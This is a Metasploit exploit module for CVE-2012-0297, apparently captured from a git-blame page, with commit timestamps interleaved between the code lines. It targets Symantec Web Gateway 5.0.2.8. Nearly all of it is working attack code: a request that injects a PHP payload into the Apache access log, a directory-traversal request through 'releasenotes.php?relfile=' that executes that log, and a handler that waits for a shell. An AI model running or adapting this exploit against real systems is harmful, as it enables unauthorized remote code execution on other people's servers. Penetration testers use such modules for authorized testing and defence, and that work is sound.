2012-05-27 22:47:39 -05:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-05-27 22:47:39 -05:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 16:28:54 -05:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => "Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability",
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a vulnerability found in Symantec Web Gateway's HTTP
|
|
|
|
|
service. By injecting PHP code in the access log, it is possible to load it
|
|
|
|
|
with a directory traversal flaw, which allows remote code execution under the
|
|
|
|
|
context of 'apache'. Please note that it may take up to several minutes to
|
|
|
|
|
retrieve access_log, which is about the amount of time required to see a shell
|
|
|
|
|
back.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'Unknown', #Discovery
|
|
|
|
|
'muts', #PoC
|
|
|
|
|
'sinn3r' #Metasploit
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
['CVE', '2012-0297'],
|
2016-07-15 12:00:31 -05:00
|
|
|
['OSVDB', '82023'],
|
2013-08-30 16:28:54 -05:00
|
|
|
['EDB', '18932'],
|
|
|
|
|
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00']
|
|
|
|
|
],
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'BadChars' => "\x00"
|
|
|
|
|
},
|
|
|
|
|
'DefaultOptions' =>
|
|
|
|
|
{
|
|
|
|
|
'WfsDelay' => 300, #5 minutes
|
2016-03-05 23:11:39 -06:00
|
|
|
'DisablePayloadHandler' => false,
|
2015-09-01 10:43:45 +02:00
|
|
|
'EXITFUNC' => 'thread'
|
2013-08-30 16:28:54 -05:00
|
|
|
},
|
|
|
|
|
'Platform' => ['php'],
|
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
['Symantec Web Gateway 5.0.2.8', {}]
|
|
|
|
|
],
|
|
|
|
|
'Privileged' => false,
|
|
|
|
|
'DisclosureDate' => "May 17 2012",
|
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
res = send_request_raw({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => '/spywall/login.php'
|
|
|
|
|
})
|
|
|
|
|
|
|
|
|
|
if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
|
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
|
else
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
if check == Exploit::CheckCode::Safe
|
|
|
|
|
print_status("#{rhost}:#{rport} doesn't look like Symantec Web Gateway, will not engage.")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
peer = "#{rhost}:#{rport}"
|
|
|
|
|
|
|
|
|
|
php = %Q|<?php #{payload.encoded} ?>|
|
|
|
|
|
|
|
|
|
|
# Inject PHP to log
|
2016-02-01 15:12:03 -06:00
|
|
|
print_status("Injecting PHP to log...")
|
2013-08-30 16:28:54 -05:00
|
|
|
res = send_request_raw({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => "/#{php}"
|
|
|
|
|
})
|
|
|
|
|
|
|
|
|
|
select(nil, nil, nil, 1)
|
|
|
|
|
|
|
|
|
|
# Use the directory traversal to load the PHP code
|
|
|
|
|
# access_log takes a long time to retrieve
|
2016-02-01 15:12:03 -06:00
|
|
|
print_status("Loading PHP code..")
|
2013-08-30 16:28:54 -05:00
|
|
|
send_request_raw({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log'
|
|
|
|
|
})
|
|
|
|
|
|
2016-02-01 15:12:03 -06:00
|
|
|
print_status("Waiting for a session, may take some time...")
|
2013-08-30 16:28:54 -05:00
|
|
|
|
|
|
|
|
select(nil, nil, nil, 1)
|
|
|
|
|
|
|
|
|
|
handler
|
|
|
|
|
end
|
2012-05-27 22:47:39 -05:00
|
|
|
end
|
